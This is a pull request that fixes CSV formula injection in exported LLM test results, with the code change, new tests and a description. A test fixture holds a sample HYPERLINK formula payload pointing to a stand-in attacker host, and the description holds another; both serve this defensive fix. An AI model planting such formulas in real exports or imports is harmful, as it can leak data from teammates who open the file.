### PR TITLE
fix(csv-export): neutralize formula injection in exported test results

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -33,3 +33,5 @@ UserInterfaceState.xcuserstate
 
 *.tgz
 generated/
+
+CLAUDE.md

--- a/src/lib/import-export/test-results-csv.spec.ts
+++ b/src/lib/import-export/test-results-csv.spec.ts
@@ -1,0 +1,30 @@
+import { describe, it, expect } from '@jest/globals';
+import { escapeCsvField } from './test-results-csv';
+
+describe('escapeCsvField', () => {
+  it.each(['=1+1', '+1+1', '-1+1', '@SUM(A1:A2)'])(
+    'prefixes a leading quote for formula-trigger char: %s',
+    input => {
+      expect(escapeCsvField(input)).toBe(`'${input}`);
+    },
+  );
+
+  it('neutralizes a HYPERLINK payload and still quotes the embedded comma/quotes', () => {
+    const input = '=HYPERLINK("https://evil.example","Click")';
+    expect(escapeCsvField(input)).toBe(
+      `"'=HYPERLINK(""https://evil.example"",""Click"")"`,
+    );
+  });
+
+  it('does not alter a field with no special characters', () => {
+    expect(escapeCsvField('Capital of India')).toBe('Capital of India');
+  });
+
+  it('still quotes fields containing a comma', () => {
+    expect(escapeCsvField('a,b')).toBe('"a,b"');
+  });
+
+  it('still escapes embedded quotes', () => {
+    expect(escapeCsvField('say "hi"')).toBe('"say ""hi"""');
+  });
+});

--- a/src/lib/import-export/test-results-csv.ts
+++ b/src/lib/import-export/test-results-csv.ts
@@ -1,15 +1,26 @@
 import { TestCase } from '../../types/llm-test-runner';
 
+// Leading chars that spreadsheet apps treat as a formula (CSV injection).
+const FORMULA_TRIGGER_CHARS = ['=', '+', '-', '@', '\t', '\r'];
+
 /**
  * Escapes a CSV field by wrapping it in quotes if it contains special characters
  * @param field - The field to escape
  * @returns Escaped field string
  */
 export function escapeCsvField(field: string): string {
-  if (field.includes(',') || field.includes('"') || field.includes('\n')) {
-    return `"${field.replace(/"/g, '""')}"`;
+  const neutralized = FORMULA_TRIGGER_CHARS.includes(field[0])
+    ? `'${field}`
+    : field;
+
+  if (
+    neutralized.includes(',') ||
+    neutralized.includes('"') ||
+    neutralized.includes('\n')
+  ) {
+    return `"${neutralized.replace(/"/g, '""')}"`;
   }
-  return field;
+  return neutralized;
 }
 
 /**


### PR DESCRIPTION
## Summary
- `escapeCsvField` only escaped characters that break CSV syntax (comma, quote, newline) — it didn't neutralize a leading `=`, `+`, `-`, or `@`, which Excel/Sheets/LibreOffice treat as the start of a formula regardless of CSV-level quoting.
- Since `question`, field labels, and expected/generated keywords can come from an **imported JSON test suite**, a malicious import could plant a payload like `=HYPERLINK("https://attacker.example/leak","Click")` that survives into `test-results.csv` and executes when a teammate later opens it in a spreadsheet app.
- Fix: prefix a leading `'` when a field starts with a formula-trigger character, before the existing CSV quoting logic — per [OWASP CSV Injection guidance](https://owasp.org/www-community/attacks/CSV_Injection).

Jira: [LLM-106](https://fluxon.atlassian.net/browse/LLM-106)

## Test plan
- [x] New `test-results-csv.spec.ts` covers: each formula-trigger character (`=`,`+`,`-`,`@`), a combined case (`HYPERLINK` payload containing commas/quotes), and confirms normal fields/comma/quote handling is unchanged.
- [x] `npx jest --preset @stencil/core/testing src/lib/import-export/test-results-csv.spec.ts` — 8/8 passing.
- [x] Full suite (`npx stencil test --spec --e2e --passWithNoTests`) — 27 suites / 224 tests passing.
- [x] `npm run lint` — no new errors/warnings.
- [x] Manually verified via PoC: importing a suite with `"question": "=1+1"` and exporting results previously caused Excel to display `2`; with the fix it renders as literal text.

🤖 Generated with [Claude Code](https://claude.com/claude-code)